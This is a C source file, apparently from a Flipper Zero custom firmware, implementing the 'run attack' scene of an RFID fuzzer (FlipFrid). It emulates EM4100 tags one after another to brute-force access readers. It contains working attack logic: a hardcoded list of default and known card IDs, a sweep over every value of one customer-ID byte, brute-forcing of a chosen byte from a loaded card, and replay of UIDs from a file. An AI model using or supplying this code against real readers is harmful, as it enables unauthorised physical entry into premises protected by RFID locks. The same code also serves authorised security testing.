mirror of
https://github.com/DarkFlippers/unleashed-firmware
synced 2024-12-25 20:23:07 +00:00
214 lines
8.4 KiB
C
214 lines
8.4 KiB
C
#include "flipfrid_scene_run_attack.h"
|
|
#include <gui/elements.h>
|
|
|
|
uint8_t counter = 0;
|
|
#define TIME_BETWEEN_CARDS 5
|
|
uint8_t id_list[16][5] = {
|
|
{0x00, 0x00, 0x00, 0x00, 0x00}, // Null bytes
|
|
{0xFF, 0xFF, 0xFF, 0xFF, 0xFF}, // Only FF
|
|
{0x11, 0x11, 0x11, 0x11, 0x11}, // Only 11
|
|
{0x22, 0x22, 0x22, 0x22, 0x22}, // Only 22
|
|
{0x33, 0x33, 0x33, 0x33, 0x33}, // Only 33
|
|
{0x44, 0x44, 0x44, 0x44, 0x44}, // Only 44
|
|
{0x55, 0x55, 0x55, 0x55, 0x55}, // Only 55
|
|
{0x66, 0x66, 0x66, 0x66, 0x66}, // Only 66
|
|
{0x77, 0x77, 0x77, 0x77, 0x77}, // Only 77
|
|
{0x88, 0x88, 0x88, 0x88, 0x88}, // Only 88
|
|
{0x99, 0x99, 0x99, 0x99, 0x99}, // Only 99
|
|
{0x12, 0x34, 0x56, 0x78, 0x9A}, // Incremental UID
|
|
{0x04, 0xd0, 0x9b, 0x0d, 0x6a}, // From arha
|
|
{0x34, 0x00, 0x29, 0x3d, 0x9e}, // From arha
|
|
{0x04, 0xdf, 0x00, 0x00, 0x01}, // From arha
|
|
{0xCA, 0xCA, 0xCA, 0xCA, 0xCA}, // From arha
|
|
};
|
|
|
|
void flipfrid_scene_run_attack_on_enter(FlipFridState* context) {
|
|
context->attack_step = 0;
|
|
context->dict = protocol_dict_alloc(lfrfid_protocols, LFRFIDProtocolMax);
|
|
context->worker = lfrfid_worker_alloc(context->dict);
|
|
context->protocol = protocol_dict_get_protocol_by_name(context->dict, "EM4100");
|
|
}
|
|
|
|
void flipfrid_scene_run_attack_on_exit(FlipFridState* context) {
|
|
lfrfid_worker_stop(context->worker);
|
|
lfrfid_worker_stop_thread(context->worker);
|
|
lfrfid_worker_free(context->worker);
|
|
protocol_dict_free(context->dict);
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
}
|
|
|
|
void flipfrid_scene_run_attack_on_tick(FlipFridState* context) {
|
|
if(context->is_attacking) {
|
|
if(1 == counter) {
|
|
protocol_dict_set_data(context->dict, context->protocol, context->payload, 5);
|
|
lfrfid_worker_free(context->worker);
|
|
context->worker = lfrfid_worker_alloc(context->dict);
|
|
lfrfid_worker_start_thread(context->worker);
|
|
lfrfid_worker_emulate_start(context->worker, context->protocol);
|
|
} else if(0 == counter) {
|
|
lfrfid_worker_stop(context->worker);
|
|
lfrfid_worker_stop_thread(context->worker);
|
|
switch(context->attack) {
|
|
case FlipFridAttackDefaultValues:
|
|
context->payload[0] = id_list[context->attack_step][0];
|
|
context->payload[1] = id_list[context->attack_step][1];
|
|
context->payload[2] = id_list[context->attack_step][2];
|
|
context->payload[3] = id_list[context->attack_step][3];
|
|
context->payload[4] = id_list[context->attack_step][4];
|
|
|
|
if(context->attack_step == 15) {
|
|
context->attack_step = 0;
|
|
counter = 0;
|
|
context->is_attacking = false;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
notification_message(context->notify, &sequence_single_vibro);
|
|
|
|
} else {
|
|
context->attack_step++;
|
|
}
|
|
break;
|
|
|
|
case FlipFridAttackBfCustomerId:
|
|
context->payload[0] = context->attack_step;
|
|
context->payload[1] = 0x00;
|
|
context->payload[2] = 0x00;
|
|
context->payload[3] = 0x00;
|
|
context->payload[4] = 0x00;
|
|
|
|
if(context->attack_step == 255) {
|
|
context->attack_step = 0;
|
|
counter = 0;
|
|
context->is_attacking = false;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
notification_message(context->notify, &sequence_single_vibro);
|
|
} else {
|
|
context->attack_step++;
|
|
}
|
|
break;
|
|
case FlipFridAttackLoadFile:
|
|
context->payload[0] = context->data[0];
|
|
context->payload[1] = context->data[1];
|
|
context->payload[2] = context->data[2];
|
|
context->payload[3] = context->data[3];
|
|
context->payload[4] = context->data[4];
|
|
|
|
context->payload[context->key_index] = context->attack_step;
|
|
|
|
if(context->attack_step == 255) {
|
|
context->attack_step = 0;
|
|
counter = 0;
|
|
context->is_attacking = false;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
notification_message(context->notify, &sequence_single_vibro);
|
|
break;
|
|
} else {
|
|
context->attack_step++;
|
|
}
|
|
break;
|
|
case FlipFridAttackLoadFileCustomUids:
|
|
while(true) {
|
|
string_reset(context->data_str);
|
|
if(!stream_read_line(context->uids_stream, context->data_str)) {
|
|
context->attack_step = 0;
|
|
counter = 0;
|
|
context->is_attacking = false;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
notification_message(context->notify, &sequence_single_vibro);
|
|
break;
|
|
};
|
|
if(string_get_char(context->data_str, 0) == '#') continue;
|
|
if(string_size(context->data_str) != 11) continue;
|
|
break;
|
|
}
|
|
FURI_LOG_D(TAG, string_get_cstr(context->data_str));
|
|
|
|
// string is valid, parse it in context->payload
|
|
for(uint8_t i = 0; i < 5; i++) {
|
|
char temp_str[3];
|
|
temp_str[0] = string_get_cstr(context->data_str)[i * 2];
|
|
temp_str[1] = string_get_cstr(context->data_str)[i * 2 + 1];
|
|
temp_str[2] = '\0';
|
|
context->payload[i] = (uint8_t)strtol(temp_str, NULL, 16);
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
|
|
if(counter > TIME_BETWEEN_CARDS) {
|
|
counter = 0;
|
|
} else {
|
|
counter++;
|
|
}
|
|
}
|
|
}
|
|
|
|
void flipfrid_scene_run_attack_on_event(FlipFridEvent event, FlipFridState* context) {
|
|
if(event.evt_type == EventTypeKey) {
|
|
if(event.input_type == InputTypeShort) {
|
|
switch(event.key) {
|
|
case InputKeyDown:
|
|
case InputKeyUp:
|
|
case InputKeyLeft:
|
|
case InputKeyRight:
|
|
break;
|
|
case InputKeyOk:
|
|
counter = 0;
|
|
if(!context->is_attacking) {
|
|
notification_message(context->notify, &sequence_blink_start_blue);
|
|
context->is_attacking = true;
|
|
} else {
|
|
context->is_attacking = false;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
notification_message(context->notify, &sequence_single_vibro);
|
|
}
|
|
break;
|
|
case InputKeyBack:
|
|
if(context->attack == FlipFridAttackLoadFileCustomUids) {
|
|
buffered_file_stream_close(context->uids_stream);
|
|
}
|
|
|
|
context->attack_step = 0;
|
|
context->is_attacking = false;
|
|
string_reset(context->notification_msg);
|
|
context->current_scene = SceneEntryPoint;
|
|
notification_message(context->notify, &sequence_blink_stop);
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void flipfrid_scene_run_attack_on_draw(Canvas* canvas, FlipFridState* context) {
|
|
canvas_clear(canvas);
|
|
canvas_set_color(canvas, ColorBlack);
|
|
|
|
// Frame
|
|
//canvas_draw_frame(canvas, 0, 0, 128, 64);
|
|
|
|
// Title
|
|
canvas_set_font(canvas, FontPrimary);
|
|
canvas_draw_str_aligned(
|
|
canvas, 64, 8, AlignCenter, AlignTop, string_get_cstr(context->attack_name));
|
|
|
|
char uid[16];
|
|
snprintf(
|
|
uid,
|
|
sizeof(uid),
|
|
"%02X:%02X:%02X:%02X:%02X",
|
|
context->payload[0],
|
|
context->payload[1],
|
|
context->payload[2],
|
|
context->payload[3],
|
|
context->payload[4]);
|
|
canvas_draw_str_aligned(canvas, 64, 24, AlignCenter, AlignTop, uid);
|
|
|
|
canvas_set_font(canvas, FontSecondary);
|
|
//char start_stop_msg[20];
|
|
if(context->is_attacking) {
|
|
elements_button_center(canvas, "Stop");
|
|
//snprintf(start_stop_msg, sizeof(start_stop_msg), " Press OK to stop ");
|
|
} else {
|
|
elements_button_center(canvas, "Start");
|
|
}
|
|
//canvas_draw_str_aligned(canvas, 64, 44, AlignCenter, AlignTop, start_stop_msg);
|
|
}
|